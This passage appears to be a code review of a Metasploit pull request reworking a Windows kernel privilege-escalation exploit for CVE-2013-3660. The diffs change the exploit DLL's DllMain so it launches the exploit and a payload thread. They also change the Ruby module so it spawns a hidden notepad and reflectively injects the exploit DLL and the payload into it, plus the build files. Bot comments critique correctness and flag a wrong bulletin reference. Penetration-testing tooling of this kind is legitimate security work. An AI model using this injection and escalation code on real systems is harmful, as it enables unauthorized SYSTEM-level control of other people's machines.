@@ -740,7 +759,7 @@ VOID elevator_complex_path()
if (ComplexPathFinished) {
LogMessage(L_INFO, "Success...", ComplexPathFinished);
- //ExitProcess(0);
+ CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
return;
}
@@ -756,7 +775,8 @@ VOID elevator_complex_path()
}
// A quick logging routine for debug messages.
-BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
+#ifdef DEBUGTRACE
+VOID LogMessage(LEVEL Level, PCHAR Format, ...)
{
CHAR Buffer[1024] = {0};
va_list Args;
@@ -774,28 +794,34 @@ BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
//fflush(stdout);
//flush(stderr);
-
- return TRUE;
}
-extern HINSTANCE hAppInstance;
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
+#else
+#define LogMessage(...)
+#endif
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
- BOOL bReturnValue = TRUE;
- switch( dwReason )
- {
- case DLL_QUERY_HMODULE:
- if( lpReserved != NULL )
- *(HMODULE *)lpReserved = hAppInstance;
- hAppInstance = hinstDLL;
- elevator_complex_path();
- break;
- case DLL_PROCESS_ATTACH:
- hAppInstance = hinstDLL;
- break;
- case DLL_PROCESS_DETACH:
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- break;
- }
+ BOOL bReturnValue = TRUE;
+ dprintf("[PPRFLATTENREC] DllMain invoked, reason: %u", dwReason);
+ switch (dwReason)
+ {
+ case DLL_QUERY_HMODULE:
+ hAppInstance = hinstDLL;
+ dprintf("[PPRFLATTENREC] Module queried %x", hinstDLL);
+ if (lpReserved != NULL)
+ {
+ *(HMODULE *)lpReserved = hAppInstance;
+ }
+ break;
+ case DLL_PROCESS_ATTACH:
+ hAppInstance = hinstDLL;
+ dprintf("[PPRFLATTENREC] Launching exploit with %p", lpReserved);
+ elevator_complex_path(lpReserved);
+ break;
+ case DLL_PROCESS_DETACH:
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ break;
+ }
return bReturnValue;
}
\ No newline at end of file
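Review bot: DLL_QUERY_HMODULE no longer launches the exploit; DLL_PROCESS_ATTACH does, with lpReserved carrying the payload pointer that the reflective loader passes through from the thread parameter. That is correct for the LoadRemoteLibraryR path, but if this DLL is ever loaded by the normal loader, lpReserved on DLL_PROCESS_ATTACH is NULL for a dynamic load and points at an unrelated value for a static one, so the NULL check in elevator_complex_path covers only the first case; a comment at the case label should say the argument is only meaningful under the reflective loader. Two small things: `dprintf("[PPRFLATTENREC] Module queried %x", hinstDLL);` formats a pointer with %x where the next case uses %p, and the file still ends without a trailing newline.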
diff --git a/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj
new file mode 100755
index 0000000000..6368dc6a25
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj
@@ -0,0 +1,141 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}
+ ppr_flatten_rec
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+ v120_xp
+
+
+ DynamicLibrary
+ MultiByte
+ v120_xp
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(Configuration)\$(Platform)\
+ $(Configuration)\$(Platform)\
+ false
+ false
+ AllRules.ruleset
+
+
+ $(ProjectName).$(PlatformShortName)
+
+
+
+ Disabled
+ ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebug
+
+
+ Level3
+
+
+ Mpr.lib;%(AdditionalDependencies)
+ %(AdditionalLibraryDirectories)
+ %(DelayLoadDLLs)
+ true
+ Windows
+ MachineX86
+
+
+ /ignore:4070
+
+
+ editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+
+
+ _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ false
+ ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ $(OutDir)\
+ $(OutDir)\
+ $(OutDir)\
+ Level3
+ ProgramDatabase
+ false
+ Size
+
+
+ Mpr.lib;%(AdditionalDependencies)
+ %(AdditionalLibraryDirectories)
+ false
+ %(IgnoreSpecificDefaultLibraries)
+ %(DelayLoadDLLs)
+ false
+ true
+ $(OutDir)\ppr_flatten_rec.map
+ Windows
+
+
+
+
+ false
+
+
+ $(OutDir)\ppr_flatten_rec.lib
+ MachineX86
+ false
+
+
+ /ignore:4070
+
+
+ editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-3660\" GOTO COPY
+ mkdir "..\..\..\..\..\data\exploits\CVE-2013-3660\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-3660\"
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
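Review bot: the Release post-build step copies into `..\..\..\..\..\data\exploits\CVE-2013-3660\` while the committed binary and the Ruby module use data/exploits/cve-2013-3660/. Windows folds the case so the copy lands in the existing directory, but on a case-sensitive checkout the `IF EXIST` test fails, `mkdir` creates a second directory, and the module keeps loading a stale DLL; use the lowercase name. The naming `$(ProjectName).$(PlatformShortName)` does yield ppr_flatten_rec.x86.dll, matching the Ruby side, and only Release copying into data/ is sensible. The XML element names were lost in extraction here, so the preprocessor, /GS and SAFESEH settings cannot be reviewed from this view; please mention them in the description. The Debug editbin line lacks the `/NOLOGO` the Release one has.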
diff --git a/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters
new file mode 100755
index 0000000000..15ae50dd2e
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters
@@ -0,0 +1,9 @@
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/rdi.sln b/external/source/exploits/cve-2013-3660/rdi.sln
deleted file mode 100755
index 0a0dde7c06..0000000000
--- a/external/source/exploits/cve-2013-3660/rdi.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual C++ Express 2010
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Release|Win32 = Release|Win32
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat
index 2acf81084f..808969ad80 100755
--- a/external/source/exploits/make.bat
+++ b/external/source/exploits/make.bat
@@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
msbuild.exe make.msbuild /target:%PLAT%
POPD
+IF "%ERRORLEVEL%"=="0" (
+ ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
+ PUSHD CVE-2013-3660
+ msbuild.exe make.msbuild /target:%PLAT%
+ POPD
+)
+
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
echo Finished %ldt%
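Review bot: the new block is gated on `IF "%ERRORLEVEL%"=="0"` after the CVE-2010-0232 build, so a failure there skips this build without any message; either drop the gate or ECHO when skipping. `ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"` prints the quotes literally (the `ECHO` has no quoting rules, so drop them). `PUSHD CVE-2013-3660` uses uppercase while the directory in the tree is cve-2013-3660; harmless on Windows, but keep it consistent with the vcxproj post-build path and the Ruby module.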
diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 47bc4c96da..41a33cc523 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -27,11 +27,12 @@ class Metasploit3 < Msf::Exploit::Local
[
'Tavis Ormandy ', # Vulnerability discovery and Original Exploit
'progmboy ', # Original Exploit
- 'Keebie4e', # Metasploit integration
- 'egypt', # Metasploit integration
- 'sinn3r', # Metasploit integration
- 'Meatballs', # Metasploit integration
- 'juan vazquez' # Metasploit integration
+ 'Keebie4e', # Metasploit integration
+ 'egypt', # Metasploit integration
+ 'sinn3r', # Metasploit integration
+ 'Meatballs', # Metasploit integration
+ 'juan vazquez', # Metasploit integration
+ 'OJ Reeves' # Metasploit integration
],
'Arch' => ARCH_X86,
'Platform' => 'win',
@@ -54,12 +55,17 @@ class Metasploit3 < Msf::Exploit::Local
[ 'CVE', '2013-3660' ],
[ 'EDB', '25912' ],
[ 'OSVDB', '93539' ],
+ [ 'MSB', 'MS13-015' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ],
],
'DisclosureDate' => 'May 15 2013',
'DefaultTarget' => 0
}))
+ register_options([
+ OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 10 ])
+ ], self.class)
+
end
def check
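Review bot: the new `[ 'MSB', 'MS13-015' ]` reference looks wrong for this CVE: MS13-015 is the February 2013 .NET Framework bulletin, and CVE-2013-3660 (the EPATHOBJ flatten bug) was fixed in MS13-053 in July 2013; please verify against the bulletin before merging. The WAIT option's description should say what the wait is for (keeping the module alive until the payload thread in the host process connects back), since the datastore name alone does not explain why a local exploit needs a timer.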
@@ -110,6 +116,13 @@ class Metasploit3 < Msf::Exploit::Local
end
def exploit
+ if is_system?
+ fail_with(Exploit::Failure::None, 'Session is already elevated')
+ end
+
+ if check == Exploit::CheckCode::Safe
+ fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
+ end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
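Review bot: the two new early exits use the fully qualified `Exploit::Failure::None` / `Exploit::Failure::NotVulnerable` while the existing checks immediately below use `Failure::NoTarget`; pick one form. `check == Exploit::CheckCode::Safe` is the right comparison (Detected and Unknown still fall through to an attempt), but the message "Exploit not available on this system." hides which check failed; "target is not vulnerable" or the text `check` already prints would be clearer.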
@@ -117,56 +130,59 @@ class Metasploit3 < Msf::Exploit::Local
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
- print_status("Creating a new process and migrating...")
+ dll = ''
+ offset = nil
- cmd = "#{expand_path("%windir%")}\\System32\\notepad.exe"
- new_proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
- new_pid = new_proc.pid
+ print_status("Launching notepad to host the exploit...")
+ cmd = "notepad.exe"
+ opts = {'Hidden' => true}
+ process = client.sys.process.execute(cmd, nil, opts)
+ pid = process.pid
+ host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+ print_good("Process #{pid} launched.")
- if not new_pid
- print_error("Filed to create the new process, trying in the current one, if unsuccessful migrate by yourself")
- else
- print_status("Migrating to #{new_pid}")
- migrate_res = false
-
- begin
- migrate_res = session.core.migrate(new_pid)
- rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError
- migrate_res = false
- end
-
- if migrate_res
- print_good("Successfully migrated to process #{new_pid}")
- else
- print_warning("Unable to migrate to process #{new_pid.to_s}, trying current #{session.sys.process.getpid} instead. If still unsuccessful, please migrate manually")
+ print_status("Reflectively injecting the exploit DLL into #{pid}...")
+ library_path = ::File.join(Msf::Config.data_directory, "exploits",
+ "cve-2013-3660", "ppr_flatten_rec.x86.dll")
+ library_path = ::File.expand_path(library_path)
+ ::File.open(library_path, 'rb') { |f| dll = f.read }
+ pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
+ pe.exports.entries.each do |e|
+ if e.name =~ /^\S*ReflectiveLoader\S*/
+ offset = pe.rva_to_file_offset(e.rva)
+ break
end
end
+ # Inject the exloit, but don't run it yet.
+ exploit_mem = inject_into_pid(dll, host_process)
- print_status("Trying to load the exploit and executing...")
+ print_status("Exploit injected. Injecting payload into #{pid}...")
+ # Inject the payload into the process so that it's runnable by the exploit.
+ payload_mem = inject_into_pid(payload.encoded, host_process)
- session.core.load_library({
- "LibraryFilePath" => File.join(Msf::Config.data_directory, "exploits", "cve-2013-3660", "exploit.dll"),
- "UploadLibrary" => true,
- "Extension" => false,
- "TargetFilePath" => "#{rand_text_alpha(5 + rand(3))}.dll",
- "SaveToDisk" => false
- })
-
- print_status("Checking privileges after exploitation...")
-
- if is_system?
- print_good("Exploitation successful!")
- else
- fail_with(Failure::Unknown, "The exploitation wasn't successful but should be safe to try again")
- end
-
- if execute_shellcode(payload.encoded)
- print_good("Enjoy!")
- else
- fail_with(Failure::Unknown, "Error while executing the payload")
- end
+ print_status("Payload injected. Executing exploit...")
+ # invoke the exploit, passing in the address of the payload that
+ # we want invoked on successful exploitation.
+ host_process.thread.create(exploit_mem + offset, payload_mem)
+ wait = datastore['WAIT'].to_i
+ print_status("Exploit thread executing (can take a while to run), waiting #{wait} sec ...")
+ # TODO: talk to the guys about this, there has to be a wait involved before the
+ # exploit has finished, because the listener has to stick around for a while
+ # otherwise it shuts down before the exploit has finished.
+ Rex.sleep(wait)
+ print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
end
+protected
+
+ def inject_into_pid(payload, process)
+ payload_size = payload.length
+ payload_size += 1024 - (payload.length % 1024) unless payload.length % 1024 == 0
+ payload_mem = process.memory.allocate(payload_size)
+ process.memory.protect(payload_mem)
+ process.memory.write(payload_mem, payload)
+ return payload_mem
+ end
end
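Review bot: `offset` stays nil when no export matches `/^\S*ReflectiveLoader\S*/`, and `host_process.thread.create(exploit_mem + offset, payload_mem)` then dies with a TypeError instead of a clean failure; add a `fail_with` right after the export loop. The closing `print_good("Exploit finished, ...")` is unconditional: the removed code verified `is_system?` after running the exploit, whereas the new flow only sleeps WAIT seconds, so a kernel-side failure is indistinguishable from success on the console. Also, the hidden notepad.exe is never terminated on failure; `inject_into_pid` rounds to 1024 rather than a page and passes no protection to either `allocate` or `protect`, so the second call is at best a no-op and the intended protection (RWX, since the loader runs from the raw image) should be explicit; and "exloit" in the comment is a typo.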